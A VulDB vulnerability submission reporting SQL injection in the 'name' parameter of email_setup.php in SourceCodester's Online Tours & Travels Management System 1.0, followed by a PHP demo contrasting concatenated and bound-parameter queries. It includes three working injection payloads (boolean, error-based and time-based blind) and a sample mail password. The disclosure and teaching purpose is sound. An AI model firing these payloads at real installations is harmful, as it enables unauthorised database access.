Submit #249801: SourceCodester SourceCodester Online Tours & Travels Management System 1.0 SQL injection

Title: SourceCodester SourceCodester Online Tours & Travels Management System 1.0 SQL injection

Description: SourceCodester Online Tours & Travels Management System email_setup.php SQL injection

URL: admin/email_setup.php

Abstract: Line 37 of email_setup.php invokes a SQL query built using unvalidated input. This call could allow an attacker to modify the statement’s meaning or to execute arbitrary SQL commands.

Explanation: SQL injection errors occur when:
1. Data enters a program from an untrusted source.
2. The data is used to dynamically construct a SQL query.
In this case the data is passed to prepare() in email_setup.php at line 37.

Parameter: name (POST)

Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: name=Mayuri K.' RLIKE (SELECT (CASE WHEN (6196=6196) THEN 0x4d6179757269204b2e ELSE 0x28 END)) AND 'uWJN'='uWJN&mail_driver_host=mail.gmail.com&mail_port=587&[email protected]&mail_password=programmers324&update=

Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: name=Mayuri K.' AND EXTRACTVALUE(6478,CONCAT(0x5c,0x71706a7671,(SELECT (ELT(6478=6478,1))),0x717a6b6a71)) AND 'UqZk'='UqZk&mail_driver_host=mail.gmail.com&mail_port=587&[email protected]&mail_password=programmers324&update=

Type: time-based blind
Title: MySQL >= 5.0.12 RLIKE time-based blind
Payload: name=Mayuri K.' RLIKE SLEEP(5) AND 'beie'='beie&mail_driver_host=mail.gmail.com&mail_port=587&[email protected]&mail_password=programmers324&update=

Download Code: https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html
Source: https://blog.csdn.net/xitanging/article/details/134903112
User: zhouwenjie1221 (UID 59880)
Submission: 09/12/2023 17:10 (3 years ago)
Moderation: 13/12/2023 10:23 (4 days later)
Status: Accepted
VulDB entry: 247895 [SourceCodester Online Tours & Travels Management System 1.0 email_setup.php prepare name SQL injection]
Points: 20
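
Added example (not code from the submission or from the SourceCodester project): the description says the input reaches prepare(), and this sketch shows why calling prepare() on a string that already contains the input does not prevent injection, next to the bound-parameter form that does. The table and column names are hypothetical, the input is constructed, and an in-memory SQLite database via PDO stands in for the application's MySQL backend.

```php
<?php
// Added example: hypothetical schema; SQLite in memory stands in for MySQL.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE email_settings (id INTEGER PRIMARY KEY, name TEXT, mail_port TEXT)");

// Restore the single settings row to a known state before each run.
function reset_row(PDO $db): void {
    $db->exec("DELETE FROM email_settings");
    $db->exec("INSERT INTO email_settings (id, name, mail_port) VALUES (1, 'Admin', '587')");
}

// Vulnerable pattern: prepare() is called, but the input is already part of the SQL text.
function update_name_concat(PDO $db, string $name): void {
    $stmt = $db->prepare("UPDATE email_settings SET name = '" . $name . "' WHERE id = 1");
    $stmt->execute();
}

// Hardened pattern: the SQL text is constant; the value travels as a bound parameter.
function update_name_bound(PDO $db, string $name): void {
    $stmt = $db->prepare("UPDATE email_settings SET name = :name WHERE id = 1");
    $stmt->execute([':name' => $name]);
}

// Read back the row so both outcomes can be compared.
function row(PDO $db): array {
    return $db->query("SELECT name, mail_port FROM email_settings WHERE id = 1")
              ->fetch(PDO::FETCH_ASSOC);
}

// Constructed input: the quote closes the string literal and adds a second assignment.
$input = "x', mail_port = '0";

reset_row($db);
update_name_concat($db, $input);
print_r(row($db));   // the input changed the statement: mail_port is overwritten

reset_row($db);
update_name_bound($db, $input);
print_r(row($db));   // the input is stored verbatim in name; mail_port is untouched
```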
